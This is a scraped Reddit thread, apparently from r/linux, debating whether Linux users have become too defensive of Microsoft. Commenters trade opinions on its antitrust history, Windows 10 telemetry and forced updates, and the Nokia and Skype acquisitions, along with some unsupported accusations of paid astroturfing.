If we had competition and that was maintained over the long haul of our industry instead of the monopolist trying to be the major player in every market, by virtue of using that monopoly to gain monopoly position in other markets, we would have seen a great many changes that might have kept up the explosive growth that occurred before Microsoft gained its monopoly power and wielded it to kill all the competition.

This has all lead to poor cheaply made products and poorly executed services that ended in giving away our privacy and security and leads to naive questions about why we continue to distrust their hidden (yet obvious to those in the know) known deceptive and manipulative behavior.  The open source community accomplished what it has without Microsoft and will continue and for the most part wants to continue to do so unmolested and uncorrupted by their desire to control everything.
When I was younger, Windows was a thing that you used but weren't a big fan of. It was a tool to get things done and you'd be annoyed with it if it didn't work properly.

I've noticed a weird trend (at least on Reddit) that people vehemently defend Windows all the time. Criticizing incredibly annoying "features" of the OS will now often bring a lot of downvotes and a barrage of "well I love Windows, it's great for me, you just must know what you're doing!" comments (many of which then start agreeing with each other and start a discourse about how it's all great).

It's creepy and I can only assume that either A) it's professional astroturfing or B) Microsoft legitimately do have some weird culty following now.

This is why I dislike Reddit compared to proper forums, it was a lot easier to spot things like this on a real forum (and they were a lot less frequent) especially with established members. Reddit is a lot more casual with everyone being spread out over so many subs and the sheer number of people.
You're half right; only you're still sugar coating it. "Mistake" is far too light, they didn't make mistakes here, they made perfectly conscious and informed decisions to do what they did.


I've been using computers since the dos days in the early 90's, and remember every evil decision done by gates and ballmer, and nothing has changed that I can see after they left.


The only thing you can do is continue to downvote microsoft stories, and like you have done post examples of their shitty actions until people finally start to clue in.
Simple answer, because people use it. Buyers bias is a serieus thing, and up until a certain point.. the more is wrong with a product, the more people feel the need to defend their use of it right up until the point they ditch it, and then suddenly everything about it is bad.
The reason a new wave of criticism of Microsoft is kicked up now is because they have a Platinum Membership on the board of the Linux Foundation, purchase large sponsorships at conferences in order to get keynote speaker positions, and have been running a "Microsoft <3's Open Source" campaign for a while now.

Many people consider this a part of the [Embrace, Extend, Extinguish](https://en.wikipedia.org/wiki/Embrace,_extend,_and_extinguish) policy that originally surfaced when the US Department of Justice ran an investigation on Microsoft for potential anticompetitive practices.

They seem to command a lot of mindshare in the open source world for a company that hasn't yet open sourced any of their core product offerings. It is that disconnect and the feeling that Microsoft is saying one thing but doing another that comes off as potentially dishonest.
> Why is it so difficult to understand that they too are humans who could make mistakes

LOLNO, none of these are mistakes. 

Every single thing you've brought up is a concerted decision made to try increase their dominance or pick up their market share in particular areas, or to pick up valuable IP that they perceive necessary to their end goal, or to make the company more money at the expense of their userbase. 

What IS a mistake is the moderators of /r/Windows10 allowing the community to feed into a cycle of hating on anyone who expects to be able to use their computers as tools to get the job done without limitations on getting the job done on their own terms. Other Windows users can see the absurd toxicity for what it is, and it isn't helping Microsoft's case one bit. 
>\1. It was a mistake to bundle IE and force Windows down the OEM's throats back in 90s.

You're dead wrong there. That was a *brilliant* move that they paid the fines for and came out on top because. They may not have had the Monopoly they did for so long if they didn't do it.
These are NOT mistakes. These are planned decisions that gave power and money and influence to Microsoft and fucked everyone else. They were made on purpose to gain power and money.

And because of these decisions (and lots of others you did not list) entire computing world and internet is fucked to a significant degree.
If you lived most of your adult life in IT, cursing at the piece-of-crap engineering that went into MS products, watching as every MS contender got bought or sued or undercut, watching as MS made damn sure every single PC had Windows preloaded, watching as MS oiled the right palms so that government PCs around the world run their wares, you'd be defensive too.
I am a manager for a managed service provider (MSP).  We provide outsourced IT to lots of different types of small companies.  About 30 % of those are Mac OS X environments. The rest are all Windows.  We have maybe 1 or 2 Linux desktop users in all of our clients.  On the server side, we use Synology NAS for shared drives to cut costs instead of Windows server where possible.  We use Windows servers for larger sites that need active directory, file sharing, and many many other things that require Windows server.  We use Ubuntu server wherever possible - all depending on the tasks.

What Microsoft has done to the world with Windows 10 is a fucking disgrace and I'm surprised that there is not a significant backlash.  I notice that anytime someone posts something bad or complains about windows 10 even on a very sensible sub-reddit like /r/sysadmin, EVEN THERE - you get people saying stuff like - "That's just the way that it is" and just accepting how Microsoft and Windows 10 operates.  We are all just rolling over and letting them do this to us.

For starters, we used to require all of our customers pay for upgraded Windows 7 Pro for all business environments.  Typically if they purchased a PC from a retail shop it came with Windows 7 home.  There are several reasons for this, but this big one is the ability to join and logon to a Windows domain.

With Windows 7 Professional, you can push out group policies to automatically configure lots of different types of settings, such as password policies, desktop background, screensaver lock, printers, folder redirections, so use home directories are stored on the server, etc.  All things that are required to manage a lot of users in an enterprise environment.

With Windows 10, many of the group policies don't work to keep the games and other items out of the start menu.  They only work with Windows Enterprise, which is a further upgrade and expense for our users.

That's right.  To properly manage a business environment desktop, you need to purchase another version of Windows 10.  Not the Windows 10 Professional that most people in the industry already have via a free Windows 7 Professional to Windows 10 Professional upgrade.  The Windows 10 Enterprise is about double the price of Windows 10.

Windows 10 upgrades and updates have ruined many desktops, which require a full operating system restore.  We have this happen every few weeks.  Suddnely someone will come in on a Monday morning with a strange message and unable to boot up properly or login.  We show up onsite to find that Windows needs to be rebooted.  This was rare with Windows 7 and probably is indicative of the fact that Windows updates are not thoroughly tested as they once were by a properly staffed QA team.

If you read the various sub-reddits like /r/sysadmin or /r/computertechs etc.  you will find that many many people are holding off on the Windows 10 1803 updates, and keeping their 1709 update instead because of the sheer numbers of problems that major Windows 10 upgrades cause.


With Windows 10, we have had numerous Windows 7 PCs that automatically upgraded to Windows 10 without any interaction from the user.

Now look at all of the advertising and telemetry data that is embedded with Windows 10.  It's a basic spy tool.  Why are you paying for a dominant operating system that spies on your activities so that the vendor can make even more money off of you.

**So in summary**

* To manage Windows 10 in a business environment with group policies, you need the Enterprise.  Pro license doesn't cut it anymore.  Windows 10 Pro is worthless for using ALL Group Policies.

* It's updates are unstable and regularly cause all kinds of problems with various peripherals and drivers, and all kinds of other things.  No thorough QA.

* Windows updates periodically and randomly causes computers to need to have Windows completely re-installed.

* Spyware, advertising, and telemetry data collection all built right in to paid versions of software.

* Windows 10 upgrades were free for a period of time, which was great.  But that was just a trojan horse approach to keep people from moving to Linux.

* Many reports of Windows 7 automatically being upgraded to Windows 10 without any user interaction or opt-in.

* Windows 10 has made managing and supporting office IT environments truly unpleasant.
I'm sure some people defend microsoft because they believe in them.  But Reddit is a prime target for influencing people's viewpoint, it's one of the top sites in the world, and very heavily used by programmers.  Many of the comments are carefully crafted to attack very valid concerns by PR teams.  It's no coincidence that the shift in thought was so sudden.  
Noticed the same thing.   People suggesting that MS has changed.  When they stop extorting money out of companies for IP royalities is when I will believe they have changed.  They are the same MS that they always have been.   

'Why Microsoft Makes $5 to $15 From Every Android Device Sold"

https://www.howtogeek.com/183766/why-microsoft-makes-5-to-15-from-every-android-device-sold/
Look, I dislike Microsoft as much as the next guy, but ...

>I've never seen this kind of blind worship towards any other human or organization

You must've never encountered an Apple fan, then :)

>since the days of the reich

Ever heard of [Godwin's Law](https://en.wikipedia.org/wiki/Godwin%27s_law)?
Microsoft cost my family over $1000 within a month with their forced and sneaky windows 10 update.  This might be hard to understand for those who live in a city or area with great internet.  My family lives in a rural area in the US.  There is no internet other than mobile.  We use Verizon as our carrier and they too have crappy practices on data.

Verizon limited mobile data to 15 GB and $0.25/MB over.

My father accidentally left the mobile internet on over night and windows 10 downloaded in the background without prompting and without consent.  The next day we had a windows 10 upgrade pop up and a $1000+ internet bill that month.

There’s nothing an individual can do against greedy people like those who work for Microsoft and Verizon for their pricing practices.
>For a whole lot of people on this and related subs, Microsoft is so sacred 

Which universe are you in? 😕😕😕

The FLOSS community has missed a lot of great opportunities because it focused on hating Microsoft instead of developing tools people could easily use on their own merits. For example, web and mobile development should be a Linux thing, but the community squandered that opportunity by focusing on Windows while Apple literally walked through the backdoor and casually stole a significant chunk - if not most - of that market. MacOS (OS X then) pretty much murdered *mainstream* (note the emphasis) desktop Linux.

The community made a similar mistake on mobile: the 2 major OSes are *Google* (as opposed to AOSP) Android and iOS, both of which are effectively closed source.

If the community isn't careful the same thing might happen again with Chrome OS, which is pretty much locked down, non-free Linux that violates the very ideals of Linux in the 1st place while seeking to profit from its technical underpinnings. Google is doing to Linux what Apple did to BSD. But once again, the community is too busy trying to lynch Microsoft to care.

The biggest challenge the community faces - and the one it's already failed at - is that the world has moved from being OS-centered (e.g. Windows, MacOS, Ubuntu) to being services-centered (e.g. Gmail, Facebook, Amazon, etc.) Although these services are built on FLOSS, the services themselves are decidedly closed. We're so far past the tipping point on this it's already receded behind the horizon, as there's no way to avoid any of the major megaservices at this point.

TL,DR: Stop obsessing about Microsoft and focus the other far bigger challenges the community faces.
Microsoft has an ENORMOUS advertising budget.  A good deal is spent on astroturfing sock puppets here and other social media. 

You can really tell when they brigade a thread. massive downvoting, and very rapidly.  Especially when any major story is breaking on some bullshit MS pulled this week.

Surely there are some bona fide fanbois too, but mostly it's paid propaganda from M$ themselves.   Absolute cancer.
I use primarily Microsoft windows but I would never defend it. They scramble to get in on the data mining buisiness and they aren't doing it very subtile. After every update I loose privileges or have to restore them, which I find to be way more anoying than removing their adware.
Not one thing on that list was a mistake.   
They were all done with purpose.  
"Microsoft is so sacred that even an attempt to criticize them is going to bring the fury and wrath of the Gods of Redmond!"

Pardon? What I see is every time anything MSFT does anything remotely positive, the Linux and open-source community has a conniption fit about it.

To me, they'll always be The Evil Empire for all the reasons you give. Oh, and one you didn't, which is ongoing, which is their patent  tax on any company deploying Android  

That said, this is Nadella's Microsoft, not Gates, not Ballmer. They're a hell of a lot more Linux and open-source friendly than they've ever been before. 
> making so many mistakes and getting away without any consequence

I don't think you know what "mistake" means
Making one mistake. Making two mistakes. Even making three mistakes. All forgivable all on their own. You can even defend it saying that in the course of evolution of a company such as Microsoft there are bound to be issues.

But to consistently and regularly make anti-consumer policies, products, and technologies aren't mistakes. They're a business strategy.

To say that anything that Microsoft does is a mistake is without a doubt an injustice beyond all. These were all very pointed and specific actions taken by a company with intent.

And you want me to trust a company that consistently makes these choices? It's not blind hatred. It's almost 30 years of experience... The only one I could possibly see saying that my hatred for Microsoft is unjust is someone who has no idea what happened in the past. Aka children.
There used to be a lot of other computer and software companies with better software and computers, but Microsoft found a way to make them all disappear. Someone who was an adult in the 80's can fill in the details better than me, but that is the gist of it.  So given past history Microsoft very likely views linux just as it did all those companies years ago. Microsoft has a highlander life-philosophy.
I imagine a certain number of them are actually paid shills designed to elicit certain narratives that companies like Microsoft want to push on social media.

Although this sounds tinfoily there have been plenty of academic studies even by other companies such as Facebook that highlight the lengths companies and governments go on this.
I will preface this with I am not saying this about this post. I am giving my opinion on this subject. 

I am not a fan of MS and do not go out of my way to defend them about anything. I even cuss their name at work many days (IT Field Tech). I just sometimes see blind attacks on them and I am irritated with the argument. (I’m irritated with any blind argument of any subject) for example the whole github thing. I saw many people yelling about MS just fucking everything up and steal code or whatnot,when they had not done anything yet.( Not saying it cannot happen, but let us not condemn them for awful acts they have not committed yet) Then I saw a very good arguments about how a person did not like a company as invested into computers and software as MS controlling and influencing the biggest repository. They have a clear influence over github now. Also I saw some Open source projects leave on stance of open source and being owned by a company of proprietary software does not work with their company/project’s set of operating beliefs. I understood and could get behind those arguments. (Those were the short versions for examples) 

I also think for many users of today, what happened in the 90s with MS combative strategy against Linux is either too long ago and/or is something they are not concerned about. I do understand bad blood does not go away easily. I was a little too young for what was happening in the 90s. Back then there was only windows on computers in my mind. For me I remember Ballmer calling Linux a cancer, which has always left a bad taste in my mouth and left me disliking MS more. 

I just think we should all strive to be one better than just rage and not stoop down to levels MS has been in the past like the cancer comment. 


Also side note: points 2,3, 4,6,7 & 8 were clear business decisions made by MS and were not a mistake in anyway in there eyes. Microsoft is a business with shareholders. That gives them clear motivations to make money for the company/shareholders 
This subreddit is about Linux so why are so many people here obsessed with Microsoft? If you don't like Windows use something else and be happy. If you don't like Github being owned by Microsoft use something else and be happy. 
Have you worked as a MS admin for the past 20yrs?

Because if you had you would understand fully the reasonable levels of hatred/dislike for them as a corporation.
My hate towards Microsoft is their monopoly, as of today there is literally nobody who can compete with them, they will use their illegal practices (and money) to squash every competition before they even have a chance to develop. I will refer to the creator of [XScreenSaver: Windows Version](https://www.jwz.org/xscreensaver/xscreensaver-windows.html)

>In 1994, while chasing the tail-lights of Netscape's unprecedented success, Microsoft used their monopoly in one market -- operating systems -- to make competition with them impossible in a *different* market -- web browsers. Specifically, they used their operating system monopoly to drive the market price for web browsers to zero, instantaneously eliminating something like 60&#37; of Netscape's revenue.  
>  
>It's hard for any company to survive an injury like that. Netscape succumbed to its wounds three years later.  
>  
>In 1999, The [Department of Justice found Microsoft guilty of Anti-Trust violations](https://en.wikipedia.org/wiki/United_States_v._Microsoft_Corp.), but by then it was far too late: the company that I helped create had already been killed.
Honestly, I think this is a strawman argument and you turned the story on its head.

It's not that people blazingly love to defend Microsoft, we know all these serious mistakes and we know all they are human.  


What really happens is the opposite: people on this subreddit hate microsoft. They hate it with a passion. They hate their products, their employees, even their open source contributions.

Unfortunately, this hate makes them blind. The majority of people here blindly hates them so much that they stop being rational about it. They used to be evil, now they are irredeemably evil forever.  


I don't really like them, I think they did some shady shit in the past and I don't like most of their products. BUT what I like even less is when people turn into haters and turn their brains off in the process. And that's what's happening here. This is why you will see me (and some others) occasionally taking their side, to bring at least a tiny shred of reason to the blind MS bashing.

I like Linux a lot, that's why I subscribed to this sub. Unfortunately this sub turned into a "lets hate on Microsoft together"/tribalism/I'm finally part of something sub. I find that disgusting. If you hate on them, bring along rational arguments instead of parroting the exact same phrase over and over and over and over again (you know, the one with three words that start with a popular vowel).

Most importantly, I'm for giving them a chance. Not for their sake - but for the sake of open source. They pretend to want to contribute - let them contribute. Let them be useful. We will see where this goes.
Excuse me but how is this related to Linux?
Just Microsoft bots/employees with the purpose of changing the perception of Microsoft in the Linux community.

Ignore them. 
>After making so many mistakes and getting away without any consequence as if nothing has happened

No consequences from those mistakes is simply not a true statement.
I dunno, I don't get it either. After all the bullshit that microsoft put people through for decades, I'm not so easily wooed by a few gestures. 

IMHO, they can still suck it. 
Sometimes people get senile sooner than expected.

I've used every version of windows since 1.0 (that came bundled with Aldus Pagemaker), with the exceptions of 95, Me and Vista. I even used Windows CE back then. And while I tolerated it because in the end of the day it worked for what I needed to do with it, I never actually liked it very much (back in the 95 era, I moved to OS/2, for instance).

Now Windows 10 is so bad that it made me stop tolerating Windows and then I moved to Linux now. I have Mint on my main desktop and my laptop and AntiX on a little server. I actually wanted to make the move from W8 (which was also really bad) but ended up using W10 for some time before getting completely fed up with its shenanigans.

Now I can say that thanks to Windows, I'm a Linux user.
Personally I've never really given MS too much leeway. I remember the shitty browsing we had in the mid 90's because of what they did with Windows and IE. (Apple is today's 90's era MS, in my opinion...)

I didn't become a linux fanboi because of some need to be different from friends or a need to feel superior. I honest to god love using linux because it's not Windows. Windows 10? POS. Windows 8? Laughable. Windows 7? workable, but not enough tools for some things. There's no need to mention any version before 7. They were POS OS's. 

This isn't a terribly original or enlightening post; I just felt the need to throw some anti-MS bile out there.
Microsoft markets themself as embracing open source, yet they just *sent a guy to prison* for copying recovery discs. Those discs were useless without a valid license.

It concerns me so many folks push that we should trust Microsoft when even Microsoft's recent actions demonstrate the business does not embody the spirit of open source - recovery disc copying was a zero-loss situation for them.

I have to conclude that any embracing of open source Microsoft does must be for some specific, profitable end game - not because of a true embracing of the open source spirit.

Free Eric Lundgren!

https://www-latimes-com.cdn.ampproject.org/c/www.latimes.com/business/technology/la-fi-tn-microsoft-copyright-20180426-story.html?outputType=amp
Do people really still care about this kind of shit? I've been a Unix/Linux and now Devops-y type guy for the past 18 years. I don't give a shit about OS wars. Use the right tool for the job and move on. 
[deleted]
Like being defensive could hurt us in any way... We are being RATIONALLY PRUDENT.
Anyone with half a brain knows that M$ is full of shit. They broke Java JVM on purpose and had to pay Sun a two billion settlement also.  However it was a good strategy. Any language that would allow people to develop applicatiosn that really could run anywhere was a serious threat and had to be killed by Microsoft .. so they killed it with broken and special JVM implementations and Java went to hell. Fast. Back when Lotus Notes was a "GroupWare" buzz the Microsoft people lost their minds and rapidly pushed shit called Exchange and DCOM Transaction Server out ther door with triple the development costs. Microsoft released Windows NT 3.51 and to a limited degree Windows NT 4.0 as a cross platform product that would run on DEC Alpha servers and MIPS servers and even Sparc. As soon as people were on the platform they went for total lock in control and handed over OS pre-install to the manufacturers and forced Windows down the throats of everyone and killed all other non-intel platform support. So like I say, they are full of shit and have been since the late 80's and anyone with half a brain knows this. All other people are brainless and can be ignored.
Could be people born after 2000 who never experienced the real Microsoft.
Geez, I guess real people cannot genuinely like Microsoft and their products now, only bots and paid shills can defend them. And some of those "mistakes" are only that because you view them like that, and there are other points of view, you know. 

I swear, if only linux community focused on what's important and not their microsoft circlejerk, maybe people would actually use linux on desktops more. 
I don't accept your premise that most people in this community defend Microsoft. In my experience, the vast majority here have an irrational hatred of Microsoft. As in, complaining about them when it's not even relevant. 
> Why are so many in the linux and open source community becoming so irrationally defensive of Microsoft lately

Because the company is steering to a direction that benefits the open source software community.

Microsoft has released a [massive fruit basket of open source software](https://opensource.microsoft.com/). They are also pouring in millions of dollars to make Linux great on servers. Their main motivator for all this is [making money with Azure](https://azure.microsoft.com/en-us/pricing/details/virtual-machines/linux/), as people have a lot of Linux instances running there. However, the whole Linux ecosystem is getting the benefits.

Many Linux people want to play nice with Microsoft right now. because the company is delivering those people things that they want. It would be quite ridiculous to start yelling now "No, no, Microsoft, you're evil, go away!" It's smart to play it cool.

Besides, Microsoft is already much more open source than people would have thought in their wildest dreams a few years ago. So, from all options available, I would say that the current one is pretty good. Wanting even more would almost be asking for the impossible.
Windows 10 as a whole was a mistake. Forced updates that can brick your computer because the updates contain so many mistakes? Really?!
Sometimes I wonder how can Microsoft afford all these (and countless other) mistakes. Did Windows and Office really make them so much money that they can simply buy a failing mobile phone company just like that? Now they finally have a dead mobile OS on their hands and no amount of money and necromancy will be able to revive that rotting cadaver. They've already lost so much in this misadventure, that it would have been enough to bankrupt multiple companies during that time. But this behemoth just keeps on breathing no matter how hard it tries to commit suicide. It's just the most amazing tech story of our time.
You seem to oppose blind worshipping with blind hatred. Microsoft is nothing like what it was back in the early 90s. They are not benevolent angels, but their business plan is clearly no longer to ensure the continuation of the Windows monopoly, since it simply doesn't make any business sense anymore, thanks to Google and Apple. Nowadays they position themselves as being providers of great development tools and environments, and they've always been pretty damn good at that.

That the \[top-ranked post\]([https://www.reddit.com/r/linux/comments/8yj8mp/why\_are\_so\_many\_in\_the\_linux\_and\_open\_source/e2bbcjj/](https://www.reddit.com/r/linux/comments/8yj8mp/why_are_so_many_in_the_linux_and_open_source/e2bbcjj/)) here is a bona fide conspiracy theory says a lot about the persistently obsessed and conservative mindset of the Linux community.
It's not open-source, but Microsoft also swallowed up any company making their products better and if they couldn't they would clone the desired capability and the company would eventually die off.  Here's an example: Stac Electronic and their product "Stacker" which would compress data on the drive giving users the impression there was twice as much disk capacity, but it would be at a cost of performance of course:
https://en.wikipedia.org/wiki/Stac_Electronics

All this to say is whatever they are doing with Linux and open-source at the moment is to better their bottom-line with less effort to achieve that.  If they succeed in embracing Linux and selling Linux, they won and the Open-Source Community will lose.  Thankfully, GNU and Linux can fork themselves and enlightened users can veer away from packages subtly introduced by Microsoft within the Linux ecosystem(.NET, powershell, mono).  The migration away from github will be inevitable.

MSDN subscribers are aware that all the different levels of subscription were a different racket for gouging customers from their money on a yearly basis.  I felt relieved when Linux distros were powerful enough to veer away from that.  Thanks to all the Linux distros for existing and giving me more digital freedom.  What disappoints me most is the fact the Canadian Government has not fully migrated over to open-source non-microsoft GNU/Linux workflows for everything since it would lower the cost of ownership to Canada Tax payers.  I have been waiting for this for over 20 years and it still hasn't happened when it should.  There is still a lot of influence and corruption going on in Canada with respect to Microsoft and Government contracts at all level Federal, Provincial, and Municipal.
There are a lot of nouveau 'open source fans' that do not care one iota about the community or any sort of ethics and standards. They get angry when you make them aware that they are supporting a deeply unethical company, either directly with cash or indirectly with market share for their shit technology. For them, open source == gratis, and they couldn't give less of a fuck about anything else.
It's easy to think of big companies like Microsoft as Gargamel-type villains who are unabashedly evil and telegraph everything they do. I think they're more like packs of wolves; social organizations who largely act in their own interests but may be comprised of individual entities with their own personalities and motivations. Wolves might eat you, or lick you on the face and even play catch. 

This helps make sense of contradictory acts like developing multi-platform FLOSS software like .NET Core all the whilst funneling money into SCO lawsuits and running FUD campaigns targeted at IT professionals. It could be that the engineers and marketers and lawyers don't exactly see eye to eye on *everything*, and that all the decision making doesn't come from a single place. 

It could also be that everything they do is some kind of stratagem to get us to abandon free software, and that they really think we're stupid enough to forget everything they've done in the past few decades. I don't like to speculate on intent though. I only care what their products are, and which ones I can actually exert control over rather than the other way around. They're rare, but they exist. 
I've wondered the same. I'm suspicious the Microsoft fanboys may

* have a financial interest in Microsoft
* be part of a Microsoft-orchestrated propaganda campaign
* only know Microsoft tech and are excited they can finally ride that Microsoft wave into the lucrative FOSS-dominated market segments
* not have done their homework to understand the recurring themes in Microsoft history

Embrace. Extend. Extinguish.

If history repeats, I will now get flamed by the MS fanboys with accusations of, ahem, "circle jerking".
Most of the mistakes you listed are deliberate actions to increase Microsoft's profit.
Because the Embrace, Extend, Extinguish mantra is bullshit and makes people look like morons - it's like only referring to them as "Micro$osft" -- wow, careful you don't cut yourself on that edge!

The truth of the matter is, the world isn't black and white.

1. Microsoft is the de facto standard of the business/work industry. It's true, let's just get on with it, as much as we like Linux.  
2. You're right, how MS handled OSS *historically* was awful. It was toxic. They definitely had it in for Linux.  
3. Since Nadella took over, things have been changing - MS has a vested interest in OSS now, for good reason. It's not going away, and it makes developers as a whole better. MS is a business, and they're not idiots - to try and go against OSS now would be stupid and they know it. So instead, they've decided to embrace it and use it *where it is applicable to their interests*.  
4. Extending the above: *to their interests*. They're a business. They make a propriety OS. So where the OS is concerned, they don't really get involved. This is *completely fine*. BUT, Windows is not Microsoft's main money maker - in fact, it's actually a diminishing source of income for them, which brings me on to:  
5. Microsoft also has a large stake in the cloud business, where Azure is strong as hell, and also developers - they want to recruit the best, so they want to help make the best. In both cases, working with OSS is in their favour. This is not an *extend, extinguish* thing - it's frankly basic business. By working in these sectors, MS in turn get's a decent ROI.  
6. Computing isn't some mystical sector any more - where before, trying to strongarm being the winner worked in their favour - and again, I state they're a business, so they will do whatever they can to be on top - now, it's a mainstream, normal, boring part of everyday life. It's why cars don't try to strongarm their way to being the only manufacturer - it's not feasible, and a waste of time. Instead, work on what you can to be the best you can.  


Do I prefer Linux and wish we could use FOSS everywhere? Yes. Is that *right now* a feasible goal? No.  
MS also see this - perhaps from the other side, where they wish they could grow as much as a business can, but they're not idiots who would try to snuff out Unix/Linux and the like.  

Does this mean MS are now amazing? Fuck no. As I said above, they make a propriety OS - despite it being an ever-shrinking source of income for them, they're still making some boneheaded, horrible decisions with it - all the telemetry stuff in W10 is proof of that, but at the same time we all know what they do there is *beneficial to them in the long run*. If it wasn't, they wouldn't so brazenly do it. I'm still not happy with it, you're still not happy with it, so we will call them out on it - but try to do so in an articulate, educated way.  

When they do clearly, or even questionable, bullshit actions, they should be called out on it. But, and I stress the but, not everything they do falls into that now, despite what some people may scream to the skies about. They make some good decisions, some bad ones. Where they as a business do good, then don't knock it - especially if it helps us. Where they fuck up, slam it and don't use it, like a functional adult would do.

---


I'm not sure where I was going with this entire thing, but whatever.  
In short: MS do bad? Call them out! MS do good? Cool, thanks, and I mean that genuinely. Neither excludes the other, especially with a corporation as big as MS - let's be reasonable here.
1. The OEM deals were more about OS/2 than Linux. Linux was completely, 100%, utterly, incontrovertibly not ready for widespread consumer adoption in the 90s. 
2. The need for changes to the Skype protocol was realized prior to the Microsoft acquisition. 
3. Who's defending this?
4. Windows 8.1 was released Oct. 18th, 2013. Asking Microsoft to support it today is like asking Canonical to support Ubuntu 13.10 and Red Hat to support RHEL 5.10. You can **pay for** Extended Life-cycle Support for RHEL 5.11 until November 30, 2020, the same way you can still get support for Microsoft Server 2012 R2 until October 10, 2023. But for non-commercial end users? If you post a question anywhere online about a support issue with Ubuntu Server 13.10 you will be met with nothing but derision and ridicule. 
5. Who is defending this?
6. Nokia was circling the drain long before Microsoft. Their stock price was $40 in 2007 in September 2010 when Elop took over it was $6. In between 2007 and 2010 Nokia bounced from miserable failure to miserable failure losing money hand over fist every year. In 2014, when the sale to Microsoft went through the stock was barely worth more than $3. All of the zer0cool wannabes with the N97? In 2010 I was a zer0cool wannabe with an N97. It was garbage. 
7. Wunderlist is and has never been an open-source application with any connection to Linux. Eulogizing its downfall is like mourning the discontinuation of Skifree. 
8. Who is defending this?

So much of the butt-hurt stems from Nokia. I don't get it. Nokia was a hollow shell in 2010. It was a raging dumpster fire. If anything, Microsoft's cash smoothed over nearly a decade of mis-steps by Nokia's management and allowed shareholders to retain some value rather than losing everything in a spectacular collapse. Meego and Maemo were disasters.

And skype? It wasn't decentralized. Data transmission was decentralized, but that was because the original developers were broke and didn't have the money for centralized infrastructure so they grafted VoIP onto the Kazaa protocol. It was a security and maintainability nightmare and the transmission quality and reliability suffered because of it. The **closed source, proprietary** Skype protocol still relied on centralized authentication and session creation. 

During the transition from old protocol to new, you could tell who was still using the old protocol because from time to time their voice would sound like an old modem auto-negotiating its connection rate, which was acceptable in 2003 but not in 2013.

The rampant security holes were discovered BEFORE the Microsoft acquisition and I'm willing to bet the management at Skype kept them under wraps. 

>[The researchers informed Skype’s Chief Technology Strategist, Jonathan D. Rosenberg, via email of their findings in November 2010, before Microsoft purchased Skype, and again in late September (2011).](https://www.fastcompany.com/1790447/skypes-huge-new-security-headaches)

And then Microsoft pumped manpower and money into a program to fix the security nightmare, because unlike the original owners they had something to lose with all of the incoming exploits.

It is very strange that open source users care, at all, about Skype. 
Yet, majority on this thread hates Microsoft
I think everyone is way too butt hurt about everything, if you dont like microsoft products or actions, dont use their stuff, if you dont like linux, dont use it. This back and forth stuff is rather pointless in my own opinion
I haven't seen much irrational defense of Microsoft.

What I *have* seen is the inevitable backlash against decades of incessant anti-Microsoft screeching from within the FLOSS community.

When your goal is to reach as many users as possible to promote the FLOSS philosophy, eventually you reach some of those users, and they're put off by the ridiculously disproportionate amount of time Linux users tend to spend on talking shit about other software instead of praising their own. It's the same problem Apple encountered during its "I'm a Mac" campaign. People get tired of hearing it.

You know your right. We can do 1 of 2 things. We can sit around a circle jerk / debate about how crap Microsoft is. Or we can actually put effort into building a systems which is going to compete with them.

We have long outstanding problems with Linux. Like fragmentation into 100's of distro's. We certainly have not made it easy for companies to ship software and support it for Linux (They need to recompile and ship N versions). We need to deal with our problems. We don't. They are hard. Cause its hard to work together because everyone has different goals. But slagging Microsoft isn't actually going to fix it. We need to fix it. We need to educate people that running updates once a month for 45-60 minutes with random reboots is "not acceptable". We need to educate people that installing virus scanners because of 1000's of exploits is "not okay". We need to educate that a company stealing your information and abusing it for profit is "not okay". But most of all the people need an alternative. They do not currently have a working alternative that they know how to access, support and run applications on.


There's a few different things going on but it boils down to that people overreacting in their criticism of MS provoking an overreacting in the defence of MS.  For example, I know that personally any time I see someone write "M$", I immediately expect their opinion to be nonsense.  There's a lot of very legitimate criticism that can be made of this era's MS, but any time MS does *anything* someone will spit out "Embrace, Extend, Extinguish", act like they have a point, and a lot of idiots will nod knowingly.  This makes Linux users look like they are 11 years old, so more people rush in to balance things out, which then makes *them* look like MS shills.

A lot of it is people seem to lack the historical context.  The Halloween documents weren't important because they were documenting shady shit MS were doing, they were important because at a time when MS were publicly saying "Linux is a toy OS and not serious competition in the Enterprise space", it turns out privately their salesmen were being told to treat Linux as the number one threat.  EEE doesn't mean "MS wants to spoil anything that's cool because they are teh evulz", it means "MS wants to be the only choice for selling you the cool stuff" (extinguish refers to the *competition*, not the product), and it's a problem because a) their product may be inferior, b) if they're the only choice you probably won't like their prices, and c) a healthy ecosystem makes for better products

This is a GOOD question. I think it's the same reason so many "gamers" are shilling for Denuvo over on r/pcgaming. 
I defend Microsoft sometimes here because of how lazy the arguments against them are. Yes I realize Microsoft in the past was extremely hostile to the open source movement, although clearly they've changed recently. So many people arguing against them pretend like Microsoft hasn't changed and act like Balmer is still the CEO. If you want to bash Microsoft at least acknowledge that they've seemed to change and address that. And ffs stop spamming the wikipedia article for eee, we've all read it
[deleted]
At this point Microsoft is no threat to linux at all. We rule the server space and are growing in desktops.
>!CENSORED!<
Wouldn't it be funny if the fanboys were actually just Microsoft propaganda bots (powered by Bing ;) )?
Where??? I think you subscribe to the wrong subreddits.
I disagree with the term "irrationally"
Money makes people do strange things. And in case you don't think that Microsoft is willing to pay people to pretend to be fans of them and their products, they've been busted in the past doing exactly that. https://arstechnica.com/gaming/2014/01/stealth-marketing-microsoft-paying-youtubers-for-xbox-one-mentions/
I wonder how many accounts are paid to try and sway opinion
Hullo!

I've been running Linux since 2000. 

Fuck Microsoft. 

If you don't like it, you're more than welcome to perform fellatio on me.
Listen: there is a Genuine Advantage to supporting Microsoft; you're just not seeing that. Install a little more spyware and you'll see the light. 
> lately

You must be young. 
[removed]
I don't really notice this trend at all. 

In fact, I'd say I have a difficult time dealing with the Linux community because it takes such a scorched earth approach when it comes to people running other OSes.  For the life of me I just can't figure out why you care so much about what OS your spouse, kids, neighbors, or perfect strangers standing in line behind you at the grocery store run.  The need to tell anyone you meet about how much better Linux is than Windows, mac OS, or whatever just baffles me.  

I find myself unsubscribing then resubscribing to this sub often because I just get tired of reading about the "war" with Microsoft.  Who the hell cares?  I mean even just reading some of the responses here about Microsoft paying people to post on /r/Linux to win the war makes me wonder how many of you are really "all there". 
Are they though? I haven't noticed anyone defending windows really. I despise the platform more than I do most things. I only use it for my Steam Library and recent endeavor into game development, but Linux is by far the superior platform. And I would argue most computer competent people would agree. 
Don't say anything negative about Microsoft !  You will be banned !
Paid shills.

Microsoft has been pushing a PR campaign that they love linux and wish to support it, what they are doing is paying people, and putting in paid people to invade opensource communities and start changing the perception of proprietary software and the perception of microsoft itself.

Techies are the people who help spread change.

